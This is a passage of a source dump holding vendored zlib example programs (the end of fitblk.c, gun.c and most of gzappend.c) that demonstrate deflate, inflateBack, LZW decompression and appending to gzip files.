Z_MEM_ERROR) return ret; /* compress what was decompressed until done or no room */ def->avail_in = RAWLEN - inf->avail_out; def->next_in = raw; if (inf->avail_out != 0) flush = Z_FINISH; ret = deflate(def, flush); assert(ret != Z_STREAM_ERROR); } while (ret != Z_STREAM_END && def->avail_out != 0); return ret; } #define EXCESS 256 /* empirically determined stream overage */ #define MARGIN 8 /* amount to back off for completion */ /* compress from stdin to fixed-size block on stdout */ int main(int argc, char **argv) { int ret; /* return code */ unsigned size; /* requested fixed output block size */ unsigned have; /* bytes written by deflate() call */ unsigned char *blk; /* intermediate and final stream */ unsigned char *tmp; /* close to desired size stream */ z_stream def, inf; /* zlib deflate and inflate states */ /* get requested output size */ if (argc != 2) quit("need one argument: size of output block"); ret = strtol(argv[1], argv + 1, 10); if (argv[1][0] != 0) quit("argument must be a number"); if (ret < 8) /* 8 is minimum zlib stream size */ quit("need positive size of 8 or greater"); size = (unsigned)ret; /* allocate memory for buffers and compression engine */ blk = malloc(size + EXCESS); def.zalloc = Z_NULL; def.zfree = Z_NULL; def.opaque = Z_NULL; ret = deflateInit(&def, Z_DEFAULT_COMPRESSION); if (ret != Z_OK || blk == NULL) quit("out of memory"); /* compress from stdin until output full, or no more input */ def.avail_out = size + EXCESS; def.next_out = blk; ret = partcompress(stdin, &def); if (ret == Z_ERRNO) quit("error reading input"); /* if it all fit, then size was undersubscribed -- done! */ if (ret == Z_STREAM_END && def.avail_out >= EXCESS) { /* write block to stdout */ have = size + EXCESS - def.avail_out; if (fwrite(blk, 1, have, stdout) != have || ferror(stdout)) quit("error writing output"); /* clean up and print results to stderr */ ret = deflateEnd(&def); assert(ret != Z_STREAM_ERROR); free(blk); fprintf(stderr, "%u bytes unused out of %u requested (all input)\n", size - have, size); return 0; } /* it didn't all fit -- set up for recompression */ inf.zalloc = Z_NULL; inf.zfree = Z_NULL; inf.opaque = Z_NULL; inf.avail_in = 0; inf.next_in = Z_NULL; ret = inflateInit(&inf); tmp = malloc(size + EXCESS); if (ret != Z_OK || tmp == NULL) quit("out of memory"); ret = deflateReset(&def); assert(ret != Z_STREAM_ERROR); /* do first recompression close to the right amount */ inf.avail_in = size + EXCESS; inf.next_in = blk; def.avail_out = size + EXCESS; def.next_out = tmp; ret = recompress(&inf, &def); if (ret == Z_MEM_ERROR) quit("out of memory"); /* set up for next recompression */ ret = inflateReset(&inf); assert(ret != Z_STREAM_ERROR); ret = deflateReset(&def); assert(ret != Z_STREAM_ERROR); /* do second and final recompression (third compression) */ inf.avail_in = size - MARGIN; /* assure stream will complete */ inf.next_in = tmp; def.avail_out = size; def.next_out = blk; ret = recompress(&inf, &def); if (ret == Z_MEM_ERROR) quit("out of memory"); assert(ret == Z_STREAM_END); /* otherwise MARGIN too small */ /* done -- write block to stdout */ have = size - def.avail_out; if (fwrite(blk, 1, have, stdout) != have || ferror(stdout)) quit("error writing output"); /* clean up and print results to stderr */ free(tmp); ret = inflateEnd(&inf); assert(ret != Z_STREAM_ERROR); ret = deflateEnd(&def); assert(ret != Z_STREAM_ERROR); free(blk); fprintf(stderr, "%u bytes unused out of %u requested (%lu input)\n", size - have, size, def.total_in); return 0; } ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/examples/gun.c ================================================ /* gun.c -- simple gunzip to give an example of the use of inflateBack() * Copyright (C) 2003, 2005, 2008, 2010, 2012 Mark Adler * For conditions of distribution and use, see copyright notice in zlib.h Version 1.7 12 August 2012 Mark Adler */ /* Version history: 1.0 16 Feb 2003 First version for testing of inflateBack() 1.1 21 Feb 2005 Decompress concatenated gzip streams Remove use of "this" variable (C++ keyword) Fix return value for in() Improve allocation failure checking Add typecasting for void * structures Add -h option for command version and usage Add a bunch of comments 1.2 20 Mar 2005 Add Unix compress (LZW) decompression Copy file attributes from input file to output file 1.3 12 Jun 2005 Add casts for error messages [Oberhumer] 1.4 8 Dec 2006 LZW decompression speed improvements 1.5 9 Feb 2008 Avoid warning in latest version of gcc 1.6 17 Jan 2010 Avoid signed/unsigned comparison warnings 1.7 12 Aug 2012 Update for z_const usage in zlib 1.2.8 */ /* gun [ -t ] [ name ... ] decompresses the data in the named gzip files. If no arguments are given, gun will decompress from stdin to stdout. The names must end in .gz, -gz, .z, -z, _z, or .Z. The uncompressed data will be written to a file name with the suffix stripped. On success, the original file is deleted. On failure, the output file is deleted. For most failures, the command will continue to process the remaining names on the command line. A memory allocation failure will abort the command. If -t is specified, then the listed files or stdin will be tested as gzip files for integrity (without checking for a proper suffix), no output will be written, and no files will be deleted. Like gzip, gun allows concatenated gzip streams and will decompress them, writing all of the uncompressed data to the output. Unlike gzip, gun allows an empty file on input, and will produce no error writing an empty output file. gun will also decompress files made by Unix compress, which uses LZW compression. These files are automatically detected by virtue of their magic header bytes. Since the end of Unix compress stream is marked by the end-of-file, they cannot be concatenated. If a Unix compress stream is encountered in an input file, it is the last stream in that file. Like gunzip and uncompress, the file attributes of the original compressed file are maintained in the final uncompressed file, to the extent that the user permissions allow it. On my Mac OS X PowerPC G4, gun is almost twice as fast as gunzip (version 1.2.4) is on the same file, when gun is linked with zlib 1.2.2. Also the LZW decompression provided by gun is about twice as fast as the standard Unix uncompress command. */ /* external functions and related types and constants */ #include /* fprintf() */ #include /* malloc(), free() */ #include /* strerror(), strcmp(), strlen(), memcpy() */ #include /* errno */ #include /* open() */ #include /* read(), write(), close(), chown(), unlink() */ #include #include /* stat(), chmod() */ #include /* utime() */ #include "zlib.h" /* inflateBackInit(), inflateBack(), */ /* inflateBackEnd(), crc32() */ /* function declaration */ #define local static /* buffer constants */ #define SIZE 32768U /* input and output buffer sizes */ #define PIECE 16384 /* limits i/o chunks for 16-bit int case */ /* structure for infback() to pass to input function in() -- it maintains the input file and a buffer of size SIZE */ struct ind { int infile; unsigned char *inbuf; }; /* Load input buffer, assumed to be empty, and return bytes loaded and a pointer to them. read() is called until the buffer is full, or until it returns end-of-file or error. Return 0 on error. */ local unsigned in(void *in_desc, z_const unsigned char **buf) { int ret; unsigned len; unsigned char *next; struct ind *me = (struct ind *)in_desc; next = me->inbuf; *buf = next; len = 0; do { ret = PIECE; if ((unsigned)ret > SIZE - len) ret = (int)(SIZE - len); ret = (int)read(me->infile, next, ret); if (ret == -1) { len = 0; break; } next += ret; len += ret; } while (ret != 0 && len < SIZE); return len; } /* structure for infback() to pass to output function out() -- it maintains the output file, a running CRC-32 check on the output and the total number of bytes output, both for checking against the gzip trailer. (The length in the gzip trailer is stored modulo 2^32, so it's ok if a long is 32 bits and the output is greater than 4 GB.) */ struct outd { int outfile; int check; /* true if checking crc and total */ unsigned long crc; unsigned long total; }; /* Write output buffer and update the CRC-32 and total bytes written. write() is called until all of the output is written or an error is encountered. On success out() returns 0. For a write failure, out() returns 1. If the output file descriptor is -1, then nothing is written. */ local int out(void *out_desc, unsigned char *buf, unsigned len) { int ret; struct outd *me = (struct outd *)out_desc; if (me->check) { me->crc = crc32(me->crc, buf, len); me->total += len; } if (me->outfile != -1) do { ret = PIECE; if ((unsigned)ret > len) ret = (int)len; ret = (int)write(me->outfile, buf, ret); if (ret == -1) return 1; buf += ret; len -= ret; } while (len != 0); return 0; } /* next input byte macro for use inside lunpipe() and gunpipe() */ #define NEXT() (have ? 0 : (have = in(indp, &next)), \ last = have ? (have--, (int)(*next++)) : -1) /* memory for gunpipe() and lunpipe() -- the first 256 entries of prefix[] and suffix[] are never used, could have offset the index, but it's faster to waste the memory */ unsigned char inbuf[SIZE]; /* input buffer */ unsigned char outbuf[SIZE]; /* output buffer */ unsigned short prefix[65536]; /* index to LZW prefix string */ unsigned char suffix[65536]; /* one-character LZW suffix */ unsigned char match[65280 + 2]; /* buffer for reversed match or gzip 32K sliding window */ /* throw out what's left in the current bits byte buffer (this is a vestigial aspect of the compressed data format derived from an implementation that made use of a special VAX machine instruction!) */ #define FLUSHCODE() \ do { \ left = 0; \ rem = 0; \ if (chunk > have) { \ chunk -= have; \ have = 0; \ if (NEXT() == -1) \ break; \ chunk--; \ if (chunk > have) { \ chunk = have = 0; \ break; \ } \ } \ have -= chunk; \ next += chunk; \ chunk = 0; \ } while (0) /* Decompress a compress (LZW) file from indp to outfile. The compress magic header (two bytes) has already been read and verified. There are have bytes of buffered input at next. strm is used for passing error information back to gunpipe(). lunpipe() will return Z_OK on success, Z_BUF_ERROR for an unexpected end of file, read error, or write error (a write error indicated by strm->next_in not equal to Z_NULL), or Z_DATA_ERROR for invalid input. */ local int lunpipe(unsigned have, z_const unsigned char *next, struct ind *indp, int outfile, z_stream *strm) { int last; /* last byte read by NEXT(), or -1 if EOF */ unsigned chunk; /* bytes left in current chunk */ int left; /* bits left in rem */ unsigned rem; /* unused bits from input */ int bits; /* current bits per code */ unsigned code; /* code, table traversal index */ unsigned mask; /* mask for current bits codes */ int max; /* maximum bits per code for this stream */ unsigned flags; /* compress flags, then block compress flag */ unsigned end; /* last valid entry in prefix/suffix tables */ unsigned temp; /* current code */ unsigned prev; /* previous code */ unsigned final; /* last character written for previous code */ unsigned stack; /* next position for reversed string */ unsigned outcnt; /* bytes in output buffer */ struct outd outd; /* output structure */ unsigned char *p; /* set up output */ outd.outfile = outfile; outd.check = 0; /* process remainder of compress header -- a flags byte */ flags = NEXT(); if (last == -1) return Z_BUF_ERROR; if (flags & 0x60) { strm->msg = (char *)"unknown lzw flags set"; return Z_DATA_ERROR; } max = flags & 0x1f; if (max < 9 || max > 16) { strm->msg = (char *)"lzw bits out of range"; return Z_DATA_ERROR; } if (max == 9) /* 9 doesn't really mean 9 */ max = 10; flags &= 0x80; /* true if block compress */ /* clear table */ bits = 9; mask = 0x1ff; end = flags ? 256 : 255; /* set up: get first 9-bit code, which is the first decompressed byte, but don't create a table entry until the next code */ if (NEXT() == -1) /* no compressed data is ok */ return Z_OK; final = prev = (unsigned)last; /* low 8 bits of code */ if (NEXT() == -1) /* missing a bit */ return Z_BUF_ERROR; if (last & 1) { /* code must be < 256 */ strm->msg = (char *)"invalid lzw code"; return Z_DATA_ERROR; } rem = (unsigned)last >> 1; /* remaining 7 bits */ left = 7; chunk = bits - 2; /* 7 bytes left in this chunk */ outbuf[0] = (unsigned char)final; /* write first decompressed byte */ outcnt = 1; /* decode codes */ stack = 0; for (;;) { /* if the table will be full after this, increment the code size */ if (end >= mask && bits < max) { FLUSHCODE(); bits++; mask <<= 1; mask++; } /* get a code of length bits */ if (chunk == 0) /* decrement chunk modulo bits */ chunk = bits; code = rem; /* low bits of code */ if (NEXT() == -1) { /* EOF is end of compressed data */ /* write remaining buffered output */ if (outcnt && out(&outd, outbuf, outcnt)) { strm->next_in = outbuf; /* signal write error */ return Z_BUF_ERROR; } return Z_OK; } code += (unsigned)last << left; /* middle (or high) bits of code */ left += 8; chunk--; if (bits > left) { /* need more bits */ if (NEXT() == -1) /* can't end in middle of code */ return Z_BUF_ERROR; code += (unsigned)last << left; /* high bits of code */ left += 8; chunk--; } code &= mask; /* mask to current code length */ left -= bits; /* number of unused bits */ rem = (unsigned)last >> (8 - left); /* unused bits from last byte */ /* process clear code (256) */ if (code == 256 && flags) { FLUSHCODE(); bits = 9; /* initialize bits and mask */ mask = 0x1ff; end = 255; /* empty table */ continue; /* get next code */ } /* special code to reuse last match */ temp = code; /* save the current code */ if (code > end) { /* Be picky on the allowed code here, and make sure that the code we drop through (prev) will be a valid index so that random input does not cause an exception. The code != end + 1 check is empirically derived, and not checked in the original uncompress code. If this ever causes a problem, that check could be safely removed. Leaving this check in greatly improves gun's ability to detect random or corrupted input after a compress header. In any case, the prev > end check must be retained. */ if (code != end + 1 || prev > end) { strm->msg = (char *)"invalid lzw code"; return Z_DATA_ERROR; } match[stack++] = (unsigned char)final; code = prev; } /* walk through linked list to generate output in reverse order */ p = match + stack; while (code >= 256) { *p++ = suffix[code]; code = prefix[code]; } stack = p - match; match[stack++] = (unsigned char)code; final = code; /* link new table entry */ if (end < mask) { end++; prefix[end] = (unsigned short)prev; suffix[end] = (unsigned char)final; } /* set previous code for next iteration */ prev = temp; /* write output in forward order */ while (stack > SIZE - outcnt) { while (outcnt < SIZE) outbuf[outcnt++] = match[--stack]; if (out(&outd, outbuf, outcnt)) { strm->next_in = outbuf; /* signal write error */ return Z_BUF_ERROR; } outcnt = 0; } p = match + stack; do { outbuf[outcnt++] = *--p; } while (p > match); stack = 0; /* loop for next code with final and prev as the last match, rem and left provide the first 0..7 bits of the next code, end is the last valid table entry */ } } /* Decompress a gzip file from infile to outfile. strm is assumed to have been successfully initialized with inflateBackInit(). The input file may consist of a series of gzip streams, in which case all of them will be decompressed to the output file. If outfile is -1, then the gzip stream(s) integrity is checked and nothing is written. The return value is a zlib error code: Z_MEM_ERROR if out of memory, Z_DATA_ERROR if the header or the compressed data is invalid, or if the trailer CRC-32 check or length doesn't match, Z_BUF_ERROR if the input ends prematurely or a write error occurs, or Z_ERRNO if junk (not a another gzip stream) follows a valid gzip stream. */ local int gunpipe(z_stream *strm, int infile, int outfile) { int ret, first, last; unsigned have, flags, len; z_const unsigned char *next = NULL; struct ind ind, *indp; struct outd outd; /* setup input buffer */ ind.infile = infile; ind.inbuf = inbuf; indp = &ind; /* decompress concatenated gzip streams */ have = 0; /* no input data read in yet */ first = 1; /* looking for first gzip header */ strm->next_in = Z_NULL; /* so Z_BUF_ERROR means EOF */ for (;;) { /* look for the two magic header bytes for a gzip stream */ if (NEXT() == -1) { ret = Z_OK; break; /* empty gzip stream is ok */ } if (last != 31 || (NEXT() != 139 && last != 157)) { strm->msg = (char *)"incorrect header check"; ret = first ? Z_DATA_ERROR : Z_ERRNO; break; /* not a gzip or compress header */ } first = 0; /* next non-header is junk */ /* process a compress (LZW) file -- can't be concatenated after this */ if (last == 157) { ret = lunpipe(have, next, indp, outfile, strm); break; } /* process remainder of gzip header */ ret = Z_BUF_ERROR; if (NEXT() != 8) { /* only deflate method allowed */ if (last == -1) break; strm->msg = (char *)"unknown compression method"; ret = Z_DATA_ERROR; break; } flags = NEXT(); /* header flags */ NEXT(); /* discard mod time, xflgs, os */ NEXT(); NEXT(); NEXT(); NEXT(); NEXT(); if (last == -1) break; if (flags & 0xe0) { strm->msg = (char *)"unknown header flags set"; ret = Z_DATA_ERROR; break; } if (flags & 4) { /* extra field */ len = NEXT(); len += (unsigned)(NEXT()) << 8; if (last == -1) break; while (len > have) { len -= have; have = 0; if (NEXT() == -1) break; len--; } if (last == -1) break; have -= len; next += len; } if (flags & 8) /* file name */ while (NEXT() != 0 && last != -1) ; if (flags & 16) /* comment */ while (NEXT() != 0 && last != -1) ; if (flags & 2) { /* header crc */ NEXT(); NEXT(); } if (last == -1) break; /* set up output */ outd.outfile = outfile; outd.check = 1; outd.crc = crc32(0L, Z_NULL, 0); outd.total = 0; /* decompress data to output */ strm->next_in = next; strm->avail_in = have; ret = inflateBack(strm, in, indp, out, &outd); if (ret != Z_STREAM_END) break; next = strm->next_in; have = strm->avail_in; strm->next_in = Z_NULL; /* so Z_BUF_ERROR means EOF */ /* check trailer */ ret = Z_BUF_ERROR; if (NEXT() != (int)(outd.crc & 0xff) || NEXT() != (int)((outd.crc >> 8) & 0xff) || NEXT() != (int)((outd.crc >> 16) & 0xff) || NEXT() != (int)((outd.crc >> 24) & 0xff)) { /* crc error */ if (last != -1) { strm->msg = (char *)"incorrect data check"; ret = Z_DATA_ERROR; } break; } if (NEXT() != (int)(outd.total & 0xff) || NEXT() != (int)((outd.total >> 8) & 0xff) || NEXT() != (int)((outd.total >> 16) & 0xff) || NEXT() != (int)((outd.total >> 24) & 0xff)) { /* length error */ if (last != -1) { strm->msg = (char *)"incorrect length check"; ret = Z_DATA_ERROR; } break; } /* go back and look for another gzip stream */ } /* clean up and return */ return ret; } /* Copy file attributes, from -> to, as best we can. This is best effort, so no errors are reported. The mode bits, including suid, sgid, and the sticky bit are copied (if allowed), the owner's user id and group id are copied (again if allowed), and the access and modify times are copied. */ local void copymeta(char *from, char *to) { struct stat was; struct utimbuf when; /* get all of from's Unix meta data, return if not a regular file */ if (stat(from, &was) != 0 || (was.st_mode & S_IFMT) != S_IFREG) return; /* set to's mode bits, ignore errors */ (void)chmod(to, was.st_mode & 07777); /* copy owner's user and group, ignore errors */ (void)chown(to, was.st_uid, was.st_gid); /* copy access and modify times, ignore errors */ when.actime = was.st_atime; when.modtime = was.st_mtime; (void)utime(to, &when); } /* Decompress the file inname to the file outnname, of if test is true, just decompress without writing and check the gzip trailer for integrity. If inname is NULL or an empty string, read from stdin. If outname is NULL or an empty string, write to stdout. strm is a pre-initialized inflateBack structure. When appropriate, copy the file attributes from inname to outname. gunzip() returns 1 if there is an out-of-memory error or an unexpected return code from gunpipe(). Otherwise it returns 0. */ local int gunzip(z_stream *strm, char *inname, char *outname, int test) { int ret; int infile, outfile; /* open files */ if (inname == NULL || *inname == 0) { inname = "-"; infile = 0; /* stdin */ } else { infile = open(inname, O_RDONLY, 0); if (infile == -1) { fprintf(stderr, "gun cannot open %s\n", inname); return 0; } } if (test) outfile = -1; else if (outname == NULL || *outname == 0) { outname = "-"; outfile = 1; /* stdout */ } else { outfile = open(outname, O_CREAT | O_TRUNC | O_WRONLY, 0666); if (outfile == -1) { close(infile); fprintf(stderr, "gun cannot create %s\n", outname); return 0; } } errno = 0; /* decompress */ ret = gunpipe(strm, infile, outfile); if (outfile > 2) close(outfile); if (infile > 2) close(infile); /* interpret result */ switch (ret) { case Z_OK: case Z_ERRNO: if (infile > 2 && outfile > 2) { copymeta(inname, outname); /* copy attributes */ unlink(inname); } if (ret == Z_ERRNO) fprintf(stderr, "gun warning: trailing garbage ignored in %s\n", inname); break; case Z_DATA_ERROR: if (outfile > 2) unlink(outname); fprintf(stderr, "gun data error on %s: %s\n", inname, strm->msg); break; case Z_MEM_ERROR: if (outfile > 2) unlink(outname); fprintf(stderr, "gun out of memory error--aborting\n"); return 1; case Z_BUF_ERROR: if (outfile > 2) unlink(outname); if (strm->next_in != Z_NULL) { fprintf(stderr, "gun write error on %s: %s\n", outname, strerror(errno)); } else if (errno) { fprintf(stderr, "gun read error on %s: %s\n", inname, strerror(errno)); } else { fprintf(stderr, "gun unexpected end of file on %s\n", inname); } break; default: if (outfile > 2) unlink(outname); fprintf(stderr, "gun internal error--aborting\n"); return 1; } return 0; } /* Process the gun command line arguments. See the command syntax near the beginning of this source file. */ int main(int argc, char **argv) { int ret, len, test; char *outname; unsigned char *window; z_stream strm; /* initialize inflateBack state for repeated use */ window = match; /* reuse LZW match buffer */ strm.zalloc = Z_NULL; strm.zfree = Z_NULL; strm.opaque = Z_NULL; ret = inflateBackInit(&strm, 15, window); if (ret != Z_OK) { fprintf(stderr, "gun out of memory error--aborting\n"); return 1; } /* decompress each file to the same name with the suffix removed */ argc--; argv++; test = 0; if (argc && strcmp(*argv, "-h") == 0) { fprintf(stderr, "gun 1.6 (17 Jan 2010)\n"); fprintf(stderr, "Copyright (C) 2003-2010 Mark Adler\n"); fprintf(stderr, "usage: gun [-t] [file1.gz [file2.Z ...]]\n"); return 0; } if (argc && strcmp(*argv, "-t") == 0) { test = 1; argc--; argv++; } if (argc) do { if (test) outname = NULL; else { len = (int)strlen(*argv); if (strcmp(*argv + len - 3, ".gz") == 0 || strcmp(*argv + len - 3, "-gz") == 0) len -= 3; else if (strcmp(*argv + len - 2, ".z") == 0 || strcmp(*argv + len - 2, "-z") == 0 || strcmp(*argv + len - 2, "_z") == 0 || strcmp(*argv + len - 2, ".Z") == 0) len -= 2; else { fprintf(stderr, "gun error: no gz type on %s--skipping\n", *argv); continue; } outname = malloc(len + 1); if (outname == NULL) { fprintf(stderr, "gun out of memory error--aborting\n"); ret = 1; break; } memcpy(outname, *argv, len); outname[len] = 0; } ret = gunzip(&strm, *argv, outname, test); if (outname != NULL) free(outname); if (ret) break; } while (argv++, --argc); else ret = gunzip(&strm, NULL, NULL, test); /* clean up */ inflateBackEnd(&strm); return ret; } ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/examples/gzappend.c ================================================ /* gzappend -- command to append to a gzip file Copyright (C) 2003, 2012 Mark Adler, all rights reserved version 1.2, 11 Oct 2012 This software is provided 'as-is', without any express or implied warranty. In no event will the author be held liable for any damages arising from the use of this software. Permission is granted to anyone to use this software for any purpose, including commercial applications, and to alter it and redistribute it freely, subject to the following restrictions: 1. The origin of this software must not be misrepresented; you must not claim that you wrote the original software. If you use this software in a product, an acknowledgment in the product documentation would be appreciated but is not required. 2. Altered source versions must be plainly marked as such, and must not be misrepresented as being the original software. 3. This notice may not be removed or altered from any source distribution. Mark Adler madler@alumni.caltech.edu */ /* * Change history: * * 1.0 19 Oct 2003 - First version * 1.1 4 Nov 2003 - Expand and clarify some comments and notes * - Add version and copyright to help * - Send help to stdout instead of stderr * - Add some preemptive typecasts * - Add L to constants in lseek() calls * - Remove some debugging information in error messages * - Use new data_type definition for zlib 1.2.1 * - Simplify and unify file operations * - Finish off gzip file in gztack() * - Use deflatePrime() instead of adding empty blocks * - Keep gzip file clean on appended file read errors * - Use in-place rotate instead of auxiliary buffer * (Why you ask? Because it was fun to write!) * 1.2 11 Oct 2012 - Fix for proper z_const usage * - Check for input buffer malloc failure */ /* gzappend takes a gzip file and appends to it, compressing files from the command line or data from stdin. The gzip file is written to directly, to avoid copying that file, in case it's large. Note that this results in the unfriendly behavior that if gzappend fails, the gzip file is corrupted. This program was written to illustrate the use of the new Z_BLOCK option of zlib 1.2.x's inflate() function. This option returns from inflate() at each block boundary to facilitate locating and modifying the last block bit at the start of the final deflate block. Also whether using Z_BLOCK or not, another required feature of zlib 1.2.x is that inflate() now provides the number of unused bits in the last input byte used. gzappend will not work with versions of zlib earlier than 1.2.1. gzappend first decompresses the gzip file internally, discarding all but the last 32K of uncompressed data, and noting the location of the last block bit and the number of unused bits in the last byte of the compressed data. The gzip trailer containing the CRC-32 and length of the uncompressed data is verified. This trailer will be later overwritten. Then the last block bit is cleared by seeking back in the file and rewriting the byte that contains it. Seeking forward, the last byte of the compressed data is saved along with the number of unused bits to initialize deflate. A deflate process is initialized, using the last 32K of the uncompressed data from the gzip file to initialize the dictionary. If the total uncompressed data was less than 32K, then all of it is used to initialize the dictionary. The deflate output bit buffer is also initialized with the last bits from the original deflate stream. From here on, the data to append is simply compressed using deflate, and written to the gzip file. When that is complete, the new CRC-32 and uncompressed length are written as the trailer of the gzip file. */ #include #include #include #include #include #include "zlib.h" #define local static #define LGCHUNK 14 #define CHUNK (1U << LGCHUNK) #define DSIZE 32768U /* print an error message and terminate with extreme prejudice */ local void bye(char *msg1, char *msg2) { fprintf(stderr, "gzappend error: %s%s\n", msg1, msg2); exit(1); } /* return the greatest common divisor of a and b using Euclid's algorithm, modified to be fast when one argument much greater than the other, and coded to avoid unnecessary swapping */ local unsigned gcd(unsigned a, unsigned b) { unsigned c; while (a && b) if (a > b) { c = b; while (a - c >= c) c <<= 1; a -= c; } else { c = a; while (b - c >= c) c <<= 1; b -= c; } return a + b; } /* rotate list[0..len-1] left by rot positions, in place */ local void rotate(unsigned char *list, unsigned len, unsigned rot) { unsigned char tmp; unsigned cycles; unsigned char *start, *last, *to, *from; /* normalize rot and handle degenerate cases */ if (len < 2) return; if (rot >= len) rot %= len; if (rot == 0) return; /* pointer to last entry in list */ last = list + (len - 1); /* do simple left shift by one */ if (rot == 1) { tmp = *list; memmove(list, list + 1, len - 1); *last = tmp; return; } /* do simple right shift by one */ if (rot == len - 1) { tmp = *last; memmove(list + 1, list, len - 1); *list = tmp; return; } /* otherwise do rotate as a set of cycles in place */ cycles = gcd(len, rot); /* number of cycles */ do { start = from = list + cycles; /* start index is arbitrary */ tmp = *from; /* save entry to be overwritten */ for (;;) { to = from; /* next step in cycle */ from += rot; /* go right rot positions */ if (from > last) from -= len; /* (pointer better not wrap) */ if (from == start) break; /* all but one shifted */ *to = *from; /* shift left */ } *to = tmp; /* complete the circle */ } while (--cycles); } /* structure for gzip file read operations */ typedef struct { int fd; /* file descriptor */ int size; /* 1 << size is bytes in buf */ unsigned left; /* bytes available at next */ unsigned char *buf; /* buffer */ z_const unsigned char *next; /* next byte in buffer */ char *name; /* file name for error messages */ } file; /* reload buffer */ local int readin(file *in) { int len; len = read(in->fd, in->buf, 1 << in->size); if (len == -1) bye("error reading ", in->name); in->left = (unsigned)len; in->next = in->buf; return len; } /* read from file in, exit if end-of-file */ local int readmore(file *in) { if (readin(in) == 0) bye("unexpected end of ", in->name); return 0; } #define read1(in) (in->left == 0 ? readmore(in) : 0, \ in->left--, *(in->next)++) /* skip over n bytes of in */ local void skip(file *in, unsigned n) { unsigned bypass; if (n > in->left) { n -= in->left; bypass = n & ~((1U << in->size) - 1); if (bypass) { if (lseek(in->fd, (off_t)bypass, SEEK_CUR) == -1) bye("seeking ", in->name); n -= bypass; } readmore(in); if (n > in->left) bye("unexpected end of ", in->name); } in->left -= n; in->next += n; } /* read a four-byte unsigned integer, little-endian, from in */ unsigned long read4(file *in) { unsigned long val; val = read1(in); val += (unsigned)read1(in) << 8; val += (unsigned long)read1(in) << 16; val += (unsigned long)read1(in) << 24; return val; } /* skip over gzip header */ local void gzheader(file *in) { int flags; unsigned n; if (read1(in) != 31 || read1(in) != 139) bye(in->name, " not a gzip file"); if (read1(in) != 8) bye("unknown compression method in", in->name); flags = read1(in); if (flags & 0xe0) bye("unknown header flags set in", in->name); skip(in, 6); if (flags & 4) { n = read1(in); n += (unsigned)(read1(in)) << 8; skip(in, n); } if (flags & 8) while (read1(in) != 0) ; if (flags & 16) while (read1(in) != 0) ; if (flags & 2) skip(in, 2); } /* decompress gzip file "name", return strm with a deflate stream ready to continue compression of the data in the gzip file, and return a file descriptor pointing to where to write the compressed data -- the deflate stream is initialized to compress using level "level" */ local int gzscan(char *name, z_stream *strm, int level) { int ret, lastbit, left, full; unsigned have; unsigned long crc, tot; unsigned char *window; off_t lastoff, end; file gz; /* open gzip file */ gz.name = name; gz.fd = open(name, O_RDWR, 0); if (gz.fd == -1) bye("cannot open ", name); gz.buf = malloc(CHUNK); if (gz.buf == NULL) bye("out of memory", ""); gz.size = LGCHUNK; gz.left = 0; /* skip gzip header */ gzheader(&gz); /* prepare to decompress */ window = malloc(DSIZE); if (window == NULL) bye("out of memory", ""); strm->zalloc = Z_NULL; strm->zfree = Z_NULL; strm->opaque = Z_NULL; ret = inflateInit2(strm, -15); if (ret != Z_OK) bye("out of memory", " or library mismatch"); /* decompress the deflate stream, saving append information */ lastbit = 0; lastoff = lseek(gz.fd, 0L, SEEK_CUR) - gz.left; left = 0; strm->avail_in = gz.left; strm->next_in = gz.next; crc = crc32(0L, Z_NULL, 0); have = full = 0; do { /* if needed, get more input */ if (strm->avail_in == 0) { readmore(&gz); strm->avail_in = gz.left; strm->next_in = gz.next; } /* set up output to next available section of sliding window */ strm->avail_out = DSIZE - have; strm->next_out = window + have; /* inflate and check for errors */ ret = inflate(strm, Z_BLOCK); if (ret == Z_STREAM_ERROR) bye("internal stream error!", ""); if (ret == Z_MEM_ERROR) bye("out of memory", ""); if (ret == Z_DATA_ERROR) bye("invalid compressed data--format violated in", name); /* update crc and sliding window pointer */ crc = crc32(crc, window + have, DSIZE - have - strm->avail_out); if (strm->avail_out) have = DSIZE - strm->avail_out; else { have = 0; full = 1; } /* process end of block */ if (strm->data_type & 128) { if (strm->data_type & 64) left = strm->data_type & 0x1f; else { lastbit = strm->data_type & 0x1f; lastoff = lseek(gz.fd, 0L, SEEK_CUR) - strm->avail_in; } } } while (ret != Z_STREAM_END); inflateEnd(strm); gz.left = strm->avail_in; gz.next = strm->next_in; /* save the location of the end of the compressed data */ end = lseek(gz.fd, 0L, SEEK_CUR) - gz.left; /* check gzip trailer and save total for deflate */ if (crc != read4(&gz)) bye("invalid compressed data--crc mismatch in ", name); tot = strm->total_out; if ((tot & 0xffffffffUL) != read4(&gz)) bye("invalid compressed data--length mismatch in", name); /* if not at end of file, warn */ if (gz.left || readin(&gz)) fprintf(stderr, "gzappend warning: junk at end of gzip file overwritten\n"); /* clear last block bit */ lseek(gz.fd, lastoff - (lastbit != 0), SEEK_SET); if (read(gz.fd, gz.buf, 1) != 1) bye("reading after seek on ", name); *gz.buf = (unsigned char)(*gz.buf ^ (1 << ((8 - lastbit) & 7))); lseek(gz.fd, -1L, SEEK_CUR); if (write(gz.fd, gz.buf, 1) != 1) bye("writing after seek to ", name); /* if window wrapped, build dictionary from window by rotating */ if (full) { rotate(window, DSIZE, have); have = DSIZE; } /* set up deflate stream with window, crc, total_in, and leftover bits */ ret = deflateInit2(strm, level, Z_DEFLATED, -15, 8, Z_DEFAULT_STRATEGY); if (ret != Z_OK) bye("out of memory", ""); deflateSetDictionary(strm, window, have); strm->adler = crc; strm->total_in = tot; if (left) { lseek(gz.fd, --end, SEEK_SET); if (read(gz.fd, gz.buf, 1) != 1) bye("reading after seek on ", name); deflatePrime(strm, 8 - left, *gz.buf); } lseek(gz.fd, end, SEEK_SET); /* clean up and return */ free(window); free(gz.buf); return gz.fd; } /* append file "name" to gzip file gd using deflate stream strm -- if last is true, then finish off the deflate stream at the end */ local void gztack(char *name, int gd, z_stream *strm, int last) { int fd, len, ret; unsigned left; unsigned char *in, *out; /* open file to compress and append */ fd = 0; if (name != NULL) { fd = open(name, O_RDONLY, 0); if (fd == -1) fprintf(stderr, "gzappend warning: %s not found, skipping ...\n", name); } /* allocate buffers */ in = malloc(CHUNK); out = malloc(CHUNK); if (in == NULL || out == NULL) bye("out of memory", ""); /* compress input file and append to gzip file */ do { /* get more input */ len = read(fd, in, CHUNK); if (len == -1) { fprintf(stderr, "gzappend warning: error reading %s, skipping rest ...\n", name); len = 0; } strm->avail_in = (unsigned)len; strm->next_in = in; if (len) strm->adler = crc32(strm->adler, in, (unsigned)len); /* compress and write all 